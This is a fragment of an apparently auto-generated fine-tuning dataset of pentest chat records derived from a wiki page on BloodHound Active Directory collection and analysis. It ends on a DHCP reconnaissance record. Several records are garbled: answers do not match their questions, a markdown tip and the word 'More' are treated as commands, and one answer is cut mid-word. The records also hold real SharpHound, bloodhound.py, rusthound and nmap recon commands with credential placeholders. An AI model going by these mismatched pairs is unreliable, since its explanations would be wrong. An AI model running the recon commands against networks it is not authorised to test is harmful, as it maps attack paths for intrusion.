All\n`\n\n> [!TIP]\n> When running SharpHound from a runas /netonly-spawned command shell, you may need to let SharpHound know what username you are authenticating to other systems as with the OverrideUserName flag\n\nThe previous commands are basic but some options (i.e. Stealth and Loop) can be very useful depending on the context\n\n``bash"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of BloodHound ⚙️ - Collection", "response": "BloodHound needs to be fed JSON files containing info on the objects and relationships within the AD domain. This information are obtained with collectors (also called ingestors). The best way of doing this is using the official SharpHound (C#) collector.\n\n::: tabs\n\n=== Windows\n\nSharpHound (sources, builds) is designed targeting .Net 4.5. It can be used as a compiled executable.\n\nIt must be run from the context of a domain user, either directly through a logon or through another method such as runas (runas /netonly /user:$DOMAIN\\$USER) (see Impersonation). Alternatively, SharpHound can be used with the LdapUsername and LdapPassword flags for that matter.\n\n``bash\nSharpHound.exe --collectionmethods All\n`\n\n> [!TIP]\n> When running SharpHound from a runas /netonly-spawned command shell, you may need to let SharpHound know what username you are authenticating to other systems as with the OverrideUserName flag\n\nThe previous commands are basic but some options (i.e. Stealth and Loop) can be very useful depending on the context\n\n``bash", "metadata": {"corpus_index": 1245, "category": "active_directory", "source_file": "docs/src/ad/recon/bloodhound/index.md", "page_title": "BloodHound ⚙️", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for BloodHound ⚙️ - Collection"}, {"role": "assistant", "content": "BloodHound needs to be fed JSON files containing info on the objects and relationships within the AD domain. This information are obtained with collectors (also called ingestors). The best way of doing this is using the official SharpHound (C#) collector.\n\n::: tabs\n\n=== Windows\n\nSharpHound (sources, builds) is designed targeting .Net 4.5. It can be used as a compiled executable.\n\nIt must be run from the context of a domain user, either directly through a logon or through another method such as runas (runas /netonly /user:$DOMAIN\\$USER) (see Impersonation). Alternatively, SharpHound can be used with the LdapUsername and LdapPassword flags for that matter.\n\n``bash\nSharpHound.exe --collectionmethods All\n`\n\n> [!TIP]\n> When running SharpHound from a runas /netonly-spawned command shell, you may need to let SharpHound know what username you are authenticating to other systems as with the OverrideUserName flag\n\nThe previous commands are basic but some options (i.e. Stealth and Loop) can be very useful depending on the context\n\n``bash"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for BloodHound ⚙️ - Collection", "response": "BloodHound needs to be fed JSON files containing info on the objects and relationships within the AD domain. This information are obtained with collectors (also called ingestors). The best way of doing this is using the official SharpHound (C#) collector.\n\n::: tabs\n\n=== Windows\n\nSharpHound (sources, builds) is designed targeting .Net 4.5. It can be used as a compiled executable.\n\nIt must be run from the context of a domain user, either directly through a logon or through another method such as runas (runas /netonly /user:$DOMAIN\\$USER) (see Impersonation). Alternatively, SharpHound can be used with the LdapUsername and LdapPassword flags for that matter.\n\n``bash\nSharpHound.exe --collectionmethods All\n`\n\n> [!TIP]\n> When running SharpHound from a runas /netonly-spawned command shell, you may need to let SharpHound know what username you are authenticating to other systems as with the OverrideUserName flag\n\nThe previous commands are basic but some options (i.e. Stealth and Loop) can be very useful depending on the context\n\n``bash", "metadata": {"corpus_index": 1245, "category": "active_directory", "source_file": "docs/src/ad/recon/bloodhound/index.md", "page_title": "BloodHound ⚙️", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the SharpHound.exe command to bloodhound ⚙️ - collection"}, {"role": "assistant", "content": "SharpHound.exe --collectionmethods All"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the SharpHound.exe command to bloodhound ⚙️ - collection", "response": "SharpHound.exe --collectionmethods All", "metadata": {"corpus_index": 1246, "category": "active_directory", "source_file": "docs/src/ad/recon/bloodhound/index.md", "page_title": "BloodHound ⚙️", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "SharpHound.exe"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on BloodHound ⚙️ - Collection"}, {"role": "assistant", "content": "SharpHound.exe --collectionmethods All"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on BloodHound ⚙️ - Collection", "response": "SharpHound.exe --collectionmethods All", "metadata": {"corpus_index": 1246, "category": "active_directory", "source_file": "docs/src/ad/recon/bloodhound/index.md", "page_title": "BloodHound ⚙️", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `SharpHound.exe --collectionmethods All`?"}, {"role": "assistant", "content": "This command is used for bloodhound ⚙️ - collection. Collection"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `SharpHound.exe --collectionmethods All`?", "response": "This command is used for bloodhound ⚙️ - collection. Collection", "metadata": {"corpus_index": 1246, "category": "active_directory", "source_file": "docs/src/ad/recon/bloodhound/index.md", "page_title": "BloodHound ⚙️", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain e.g. collect sessions every 10 minutes for 3 hours"}, {"role": "assistant", "content": "SharpHound.exe --collectionmethods Session --Loop --loopduration 03:00:00 --loopinterval 00:10:00"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain e.g. collect sessions every 10 minutes for 3 hours", "response": "SharpHound.exe --collectionmethods Session --Loop --loopduration 03:00:00 --loopinterval 00:10:00", "metadata": {"corpus_index": 1247, "category": "active_directory", "source_file": "docs/src/ad/recon/bloodhound/index.md", "page_title": "BloodHound ⚙️", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do e.g. collect sessions every 10 minutes for 3 hours"}, {"role": "assistant", "content": "SharpHound.exe --collectionmethods Session --Loop --loopduration 03:00:00 --loopinterval 00:10:00"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do e.g. collect sessions every 10 minutes for 3 hours", "response": "SharpHound.exe --collectionmethods Session --Loop --loopduration 03:00:00 --loopinterval 00:10:00", "metadata": {"corpus_index": 1247, "category": "active_directory", "source_file": "docs/src/ad/recon/bloodhound/index.md", "page_title": "BloodHound ⚙️", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Tell me about Use LDAPS instead of plaintext LDAP"}, {"role": "assistant", "content": "SharpHound.exe --secureldap\n``\n\nMore help on the CLI commands here.\n\n> [!SUCCESS]\n> Here are a few tips and tricks on the collection process\n> \n> * Testers can absolutely run SharpHound from a computer that is not enrolled in the AD domain, by running it in a domain user context (e.g. with runas, pass-the-hash or overpass-the-hash). This is useful when domain computers have antivirus or other protections preventing (or slowing) testers from using enumerate or exploitation tools.\n> * When obtaining a foothold on an AD domain, testers should first run SharpHound with all collection methods, and then start a loop collection to enumerate more sessions.\n\n=== UNIX-like\n\nFrom UNIX-like system, a non-official (but very effective nonetheless) Python version can be used.\n\nBloodHound.py is a Python ingestor for BloodHound.\n\n`bash\nbloodhound.py --zip -c All -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" -dc \"$DC_HOST\" -ns \"$DC_IP\"\n`\n\n> [!TIP]\n> This ingestor is not as powerful as the C# one. It lacks most GPO collection methods, but you can complete GPO collection with GPOHound. The good news is that it can do pass-the-hash. It becomes really useful when compromising a domain account's NT hash.\n\nAn alternative called RustHound (Rust) can be used as well.\n\n`bash\nrusthound --zip -d \"$DOMAIN\" -i \"$DC_IP\" -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -o \"$OUTDIR\"\n``\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Tell me about Use LDAPS instead of plaintext LDAP", "response": "SharpHound.exe --secureldap\n``\n\nMore help on the CLI commands here.\n\n> [!SUCCESS]\n> Here are a few tips and tricks on the collection process\n> \n> * Testers can absolutely run SharpHound from a computer that is not enrolled in the AD domain, by running it in a domain user context (e.g. with runas, pass-the-hash or overpass-the-hash). This is useful when domain computers have antivirus or other protections preventing (or slowing) testers from using enumerate or exploitation tools.\n> * When obtaining a foothold on an AD domain, testers should first run SharpHound with all collection methods, and then start a loop collection to enumerate more sessions.\n\n=== UNIX-like\n\nFrom UNIX-like system, a non-official (but very effective nonetheless) Python version can be used.\n\nBloodHound.py is a Python ingestor for BloodHound.\n\n`bash\nbloodhound.py --zip -c All -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" -dc \"$DC_HOST\" -ns \"$DC_IP\"\n`\n\n> [!TIP]\n> This ingestor is not as powerful as the C# one. It lacks most GPO collection methods, but you can complete GPO collection with GPOHound. The good news is that it can do pass-the-hash. It becomes really useful when compromising a domain account's NT hash.\n\nAn alternative called RustHound (Rust) can be used as well.\n\n`bash\nrusthound --zip -d \"$DOMAIN\" -i \"$DC_IP\" -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -o \"$OUTDIR\"\n``\n\n:::", "metadata": {"corpus_index": 1248, "category": "active_directory", "source_file": "docs/src/ad/recon/bloodhound/index.md", "page_title": "BloodHound ⚙️", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for Use LDAPS instead of plaintext LDAP?"}, {"role": "assistant", "content": "SharpHound.exe --secureldap\n``\n\nMore help on the CLI commands here.\n\n> [!SUCCESS]\n> Here are a few tips and tricks on the collection process\n> \n> * Testers can absolutely run SharpHound from a computer that is not enrolled in the AD domain, by running it in a domain user context (e.g. with runas, pass-the-hash or overpass-the-hash). This is useful when domain computers have antivirus or other protections preventing (or slowing) testers from using enumerate or exploitation tools.\n> * When obtaining a foothold on an AD domain, testers should first run SharpHound with all collection methods, and then start a loop collection to enumerate more sessions.\n\n=== UNIX-like\n\nFrom UNIX-like system, a non-official (but very effective nonetheless) Python version can be used.\n\nBloodHound.py is a Python ingestor for BloodHound.\n\n`bash\nbloodhound.py --zip -c All -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" -dc \"$DC_HOST\" -ns \"$DC_IP\"\n`\n\n> [!TIP]\n> This ingestor is not as powerful as the C# one. It lacks most GPO collection methods, but you can complete GPO collection with GPOHound. The good news is that it can do pass-the-hash. It becomes really useful when compromising a domain account's NT hash.\n\nAn alternative called RustHound (Rust) can be used as well.\n\n`bash\nrusthound --zip -d \"$DOMAIN\" -i \"$DC_IP\" -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -o \"$OUTDIR\"\n``\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for Use LDAPS instead of plaintext LDAP?", "response": "SharpHound.exe --secureldap\n``\n\nMore help on the CLI commands here.\n\n> [!SUCCESS]\n> Here are a few tips and tricks on the collection process\n> \n> * Testers can absolutely run SharpHound from a computer that is not enrolled in the AD domain, by running it in a domain user context (e.g. with runas, pass-the-hash or overpass-the-hash). This is useful when domain computers have antivirus or other protections preventing (or slowing) testers from using enumerate or exploitation tools.\n> * When obtaining a foothold on an AD domain, testers should first run SharpHound with all collection methods, and then start a loop collection to enumerate more sessions.\n\n=== UNIX-like\n\nFrom UNIX-like system, a non-official (but very effective nonetheless) Python version can be used.\n\nBloodHound.py is a Python ingestor for BloodHound.\n\n`bash\nbloodhound.py --zip -c All -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" -dc \"$DC_HOST\" -ns \"$DC_IP\"\n`\n\n> [!TIP]\n> This ingestor is not as powerful as the C# one. It lacks most GPO collection methods, but you can complete GPO collection with GPOHound. The good news is that it can do pass-the-hash. It becomes really useful when compromising a domain account's NT hash.\n\nAn alternative called RustHound (Rust) can be used as well.\n\n`bash\nrusthound --zip -d \"$DOMAIN\" -i \"$DC_IP\" -u \"$USER@$DOMAIN\" -p \"$PASSWORD\" -o \"$OUTDIR\"\n``\n\n:::", "metadata": {"corpus_index": 1248, "category": "active_directory", "source_file": "docs/src/ad/recon/bloodhound/index.md", "page_title": "BloodHound ⚙️", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the More command to use ldaps instead of plaintext ldap"}, {"role": "assistant", "content": "More help on the CLI commands [here](https://github.com/BloodHoundAD/SharpHound#cli).\n\n> [!SUCCESS]\n> Here are a few tips and tricks on the collection process\n> \n> * Testers can absolutely run SharpHound from a computer that is not enrolled in the AD domain, by running it in a domain user context (e.g. with runas, [pass-the-hash](../../movement/ntlm/pth.md) or [overpass-the-hash](../../movement/kerberos/ptk.md)). This is useful when domain computers have antivirus or other protections preventing (or slowing) testers from using enumerate or exploitation tools.\n> * When obtaining a foothold on an AD domain, testers should first run SharpHound with all collection methods, and then start a loop collection to enumerate more sessions.\n\n\n=== UNIX-like\n\nFrom UNIX-like system, a non-official (but very effective nonetheless) Python version can be used.\n\n[BloodHound.py](https://github.com/fox-it/BloodHound.py) is a Python ingestor for BloodHound."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the More command to use ldaps instead of plaintext ldap", "response": "More help on the CLI commands [here](https://github.com/BloodHoundAD/SharpHound#cli).\n\n> [!SUCCESS]\n> Here are a few tips and tricks on the collection process\n> \n> * Testers can absolutely run SharpHound from a computer that is not enrolled in the AD domain, by running it in a domain user context (e.g. with runas, [pass-the-hash](../../movement/ntlm/pth.md) or [overpass-the-hash](../../movement/kerberos/ptk.md)). This is useful when domain computers have antivirus or other protections preventing (or slowing) testers from using enumerate or exploitation tools.\n> * When obtaining a foothold on an AD domain, testers should first run SharpHound with all collection methods, and then start a loop collection to enumerate more sessions.\n\n\n=== UNIX-like\n\nFrom UNIX-like system, a non-official (but very effective nonetheless) Python version can be used.\n\n[BloodHound.py](https://github.com/fox-it/BloodHound.py) is a Python ingestor for BloodHound.", "metadata": {"corpus_index": 1249, "category": "active_directory", "source_file": "docs/src/ad/recon/bloodhound/index.md", "page_title": "BloodHound ⚙️", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "More"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Use LDAPS instead of plaintext LDAP?"}, {"role": "assistant", "content": "More help on the CLI commands [here](https://github.com/BloodHoundAD/SharpHound#cli).\n\n> [!SUCCESS]\n> Here are a few tips and tricks on the collection process\n> \n> * Testers can absolutely run SharpHound from a computer that is not enrolled in the AD domain, by running it in a domain user context (e.g. with runas, [pass-the-hash](../../movement/ntlm/pth.md) or [overpass-the-hash](../../movement/kerberos/ptk.md)). This is useful when domain computers have antivirus or other protections preventing (or slowing) testers from using enumerate or exploitation tools.\n> * When obtaining a foothold on an AD domain, testers should first run SharpHound with all collection methods, and then start a loop collection to enumerate more sessions.\n\n\n=== UNIX-like\n\nFrom UNIX-like system, a non-official (but very effective nonetheless) Python version can be used.\n\n[BloodHound.py](https://github.com/fox-it/BloodHound.py) is a Python ingestor for BloodHound."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Use LDAPS instead of plaintext LDAP?", "response": "More help on the CLI commands [here](https://github.com/BloodHoundAD/SharpHound#cli).\n\n> [!SUCCESS]\n> Here are a few tips and tricks on the collection process\n> \n> * Testers can absolutely run SharpHound from a computer that is not enrolled in the AD domain, by running it in a domain user context (e.g. with runas, [pass-the-hash](../../movement/ntlm/pth.md) or [overpass-the-hash](../../movement/kerberos/ptk.md)). This is useful when domain computers have antivirus or other protections preventing (or slowing) testers from using enumerate or exploitation tools.\n> * When obtaining a foothold on an AD domain, testers should first run SharpHound with all collection methods, and then start a loop collection to enumerate more sessions.\n\n\n=== UNIX-like\n\nFrom UNIX-like system, a non-official (but very effective nonetheless) Python version can be used.\n\n[BloodHound.py](https://github.com/fox-it/BloodHound.py) is a Python ingestor for BloodHound.", "metadata": {"corpus_index": 1249, "category": "active_directory", "source_file": "docs/src/ad/recon/bloodhound/index.md", "page_title": "BloodHound ⚙️", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `More help on the CLI commands [here](https://github.com/BloodHoundAD/SharpHound#cli).`?"}, {"role": "assistant", "content": "This command is used for use ldaps instead of plaintext ldap. Use LDAPS instead of plaintext LDAP"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `More help on the CLI commands [here](https://github.com/BloodHoundAD/SharpHound#cli).`?", "response": "This command is used for use ldaps instead of plaintext ldap. Use LDAPS instead of plaintext LDAP", "metadata": {"corpus_index": 1249, "category": "active_directory", "source_file": "docs/src/ad/recon/bloodhound/index.md", "page_title": "BloodHound ⚙️", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How to execute Use LDAPS instead of plaintext LDAP?"}, {"role": "assistant", "content": "> [!TIP]\n> This ingestor is not as powerful as the C# one. It lacks most GPO collection methods, but you can complete GPO collection with [GPOHound](https://github.com/cogiceo/GPOHound). The good news is that it can do pass-the-hash. It becomes really useful when compromising a domain account's NT hash.\n\nAn alternative called [RustHound](https://github.com/OPENCYBER-FR/RustHound) (Rust) can be used as well."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How to execute Use LDAPS instead of plaintext LDAP?", "response": "> [!TIP]\n> This ingestor is not as powerful as the C# one. It lacks most GPO collection methods, but you can complete GPO collection with [GPOHound](https://github.com/cogiceo/GPOHound). The good news is that it can do pass-the-hash. It becomes really useful when compromising a domain account's NT hash.\n\nAn alternative called [RustHound](https://github.com/OPENCYBER-FR/RustHound) (Rust) can be used as well.", "metadata": {"corpus_index": 1250, "category": "active_directory", "source_file": "docs/src/ad/recon/bloodhound/index.md", "page_title": "BloodHound ⚙️", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `> [!TIP]`?"}, {"role": "assistant", "content": "This command is used for use ldaps instead of plaintext ldap. Use LDAPS instead of plaintext LDAP"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `> [!TIP]`?", "response": "This command is used for use ldaps instead of plaintext ldap. Use LDAPS instead of plaintext LDAP", "metadata": {"corpus_index": 1250, "category": "active_directory", "source_file": "docs/src/ad/recon/bloodhound/index.md", "page_title": "BloodHound ⚙️", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does BloodHound ⚙️ - Analysis work?"}, {"role": "assistant", "content": "Once the collection is over, the data can be uploaded and analyzed in BloodHound by doing the following.\n\n* Find paths between specified nodes\n* Run pre-built analytics queries to find common attack paths\n* Run custom queries to help in finding more complex attack paths or interesting objects\n* Run manual neo4j queries\n* Mark nodes as high value targets for easier path finding\n* Mark nodes as owned for easier path finding\n* Find information about selected nodes: sessions, properties, group membership/members, local admin rights, Kerberos delegations, RDP rights, outbound/inbound control rights (ACEs), and so on\n* Find help about edges/attacks (abuse, OPSEC considerations, references)\n\nUsing BloodHound can help find attack paths and abuses like ACEs abuse, Kerberos delegations abuse, credential dumping and credential shuffling, GPOs abuse, Kerberoast, ASREProast, domain trusts attacks, etc.\n\n![](<./assets/Graph example.png>)\n\nFor detailed and official documentation on the analysis process, testers can check the following resources: the BloodHound GUI, nodes and edges.\n\n> [!SUCCESS]\n> Some custom queries can be used to go even further with the analysis of attack paths, such as Exegol's custom queries.\n\n> [!SUCCESS]\n> Here are some examples of quick wins to spot with BloodHound\n> \n> * shadow admins: users that are not members of privileged Active Directory groups but have sensitive privileges over the domain (run graph queries like \"find principals with DCSync rights\", \"users with most local admin rights\", or check \"inbound control rights\" in the domain and privileged groups node info panel)\n> * other over-privileged users: user that can control many objects (ACEs) and that often leads to admins, shadow admins or sensitive servers (check for \"outbound control rights\" in the node info panel)\n> * over-privileged computers: find computers that can do (un)constrained Kerberos delegation (run graph queries like \"find computer with unconstrained delegations\")\n> * admin compu"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does BloodHound ⚙️ - Analysis work?", "response": "Once the collection is over, the data can be uploaded and analyzed in BloodHound by doing the following.\n\n* Find paths between specified nodes\n* Run pre-built analytics queries to find common attack paths\n* Run custom queries to help in finding more complex attack paths or interesting objects\n* Run manual neo4j queries\n* Mark nodes as high value targets for easier path finding\n* Mark nodes as owned for easier path finding\n* Find information about selected nodes: sessions, properties, group membership/members, local admin rights, Kerberos delegations, RDP rights, outbound/inbound control rights (ACEs), and so on\n* Find help about edges/attacks (abuse, OPSEC considerations, references)\n\nUsing BloodHound can help find attack paths and abuses like ACEs abuse, Kerberos delegations abuse, credential dumping and credential shuffling, GPOs abuse, Kerberoast, ASREProast, domain trusts attacks, etc.\n\n![](<./assets/Graph example.png>)\n\nFor detailed and official documentation on the analysis process, testers can check the following resources: the BloodHound GUI, nodes and edges.\n\n> [!SUCCESS]\n> Some custom queries can be used to go even further with the analysis of attack paths, such as Exegol's custom queries.\n\n> [!SUCCESS]\n> Here are some examples of quick wins to spot with BloodHound\n> \n> * shadow admins: users that are not members of privileged Active Directory groups but have sensitive privileges over the domain (run graph queries like \"find principals with DCSync rights\", \"users with most local admin rights\", or check \"inbound control rights\" in the domain and privileged groups node info panel)\n> * other over-privileged users: user that can control many objects (ACEs) and that often leads to admins, shadow admins or sensitive servers (check for \"outbound control rights\" in the node info panel)\n> * over-privileged computers: find computers that can do (un)constrained Kerberos delegation (run graph queries like \"find computer with unconstrained delegations\")\n> * admin compu", "metadata": {"corpus_index": 1251, "category": "active_directory", "source_file": "docs/src/ad/recon/bloodhound/index.md", "page_title": "BloodHound ⚙️", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for BloodHound ⚙️ - Analysis?"}, {"role": "assistant", "content": "Once the collection is over, the data can be uploaded and analyzed in BloodHound by doing the following.\n\n* Find paths between specified nodes\n* Run pre-built analytics queries to find common attack paths\n* Run custom queries to help in finding more complex attack paths or interesting objects\n* Run manual neo4j queries\n* Mark nodes as high value targets for easier path finding\n* Mark nodes as owned for easier path finding\n* Find information about selected nodes: sessions, properties, group membership/members, local admin rights, Kerberos delegations, RDP rights, outbound/inbound control rights (ACEs), and so on\n* Find help about edges/attacks (abuse, OPSEC considerations, references)\n\nUsing BloodHound can help find attack paths and abuses like ACEs abuse, Kerberos delegations abuse, credential dumping and credential shuffling, GPOs abuse, Kerberoast, ASREProast, domain trusts attacks, etc.\n\n![](<./assets/Graph example.png>)\n\nFor detailed and official documentation on the analysis process, testers can check the following resources: the BloodHound GUI, nodes and edges.\n\n> [!SUCCESS]\n> Some custom queries can be used to go even further with the analysis of attack paths, such as Exegol's custom queries.\n\n> [!SUCCESS]\n> Here are some examples of quick wins to spot with BloodHound\n> \n> * shadow admins: users that are not members of privileged Active Directory groups but have sensitive privileges over the domain (run graph queries like \"find principals with DCSync rights\", \"users with most local admin rights\", or check \"inbound control rights\" in the domain and privileged groups node info panel)\n> * other over-privileged users: user that can control many objects (ACEs) and that often leads to admins, shadow admins or sensitive servers (check for \"outbound control rights\" in the node info panel)\n> * over-privileged computers: find computers that can do (un)constrained Kerberos delegation (run graph queries like \"find computer with unconstrained delegations\")\n> * admin compu"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for BloodHound ⚙️ - Analysis?", "response": "Once the collection is over, the data can be uploaded and analyzed in BloodHound by doing the following.\n\n* Find paths between specified nodes\n* Run pre-built analytics queries to find common attack paths\n* Run custom queries to help in finding more complex attack paths or interesting objects\n* Run manual neo4j queries\n* Mark nodes as high value targets for easier path finding\n* Mark nodes as owned for easier path finding\n* Find information about selected nodes: sessions, properties, group membership/members, local admin rights, Kerberos delegations, RDP rights, outbound/inbound control rights (ACEs), and so on\n* Find help about edges/attacks (abuse, OPSEC considerations, references)\n\nUsing BloodHound can help find attack paths and abuses like ACEs abuse, Kerberos delegations abuse, credential dumping and credential shuffling, GPOs abuse, Kerberoast, ASREProast, domain trusts attacks, etc.\n\n![](<./assets/Graph example.png>)\n\nFor detailed and official documentation on the analysis process, testers can check the following resources: the BloodHound GUI, nodes and edges.\n\n> [!SUCCESS]\n> Some custom queries can be used to go even further with the analysis of attack paths, such as Exegol's custom queries.\n\n> [!SUCCESS]\n> Here are some examples of quick wins to spot with BloodHound\n> \n> * shadow admins: users that are not members of privileged Active Directory groups but have sensitive privileges over the domain (run graph queries like \"find principals with DCSync rights\", \"users with most local admin rights\", or check \"inbound control rights\" in the domain and privileged groups node info panel)\n> * other over-privileged users: user that can control many objects (ACEs) and that often leads to admins, shadow admins or sensitive servers (check for \"outbound control rights\" in the node info panel)\n> * over-privileged computers: find computers that can do (un)constrained Kerberos delegation (run graph queries like \"find computer with unconstrained delegations\")\n> * admin compu", "metadata": {"corpus_index": 1251, "category": "active_directory", "source_file": "docs/src/ad/recon/bloodhound/index.md", "page_title": "BloodHound ⚙️", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of DHCP"}, {"role": "assistant", "content": "When connecting a computer to most enterprise networks, if the Dynamic Host Configuration Protocol (DHCP) is enabled, it will assign an IP address to that computer, and send a lot of information. Nameservers and domain names are usually set through DHCP offer packets.\n\nOn UNIX-like systems, the /etc/resolv.conf file will store information for name resolution operations after the DHCP offer.\n\nThe nmap tool can be used with its broadcast-dhcp-discover.nse script to easily parse those packets.\n\n``bash\nnmap --script broadcast-dhcp-discover\n``\n\n> [!TIP]\n> In many cases, there will be MAC address filtering, static IP addressing, VLANs or other NAC (Network Access Control) and 802.1x that can prevent testers from obtaining this information. In those situations, Wireshark can be used to manually inspect broadcast and multicast packets that travel on the network and find valuable information that could help bypass those mitigations."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of DHCP", "response": "When 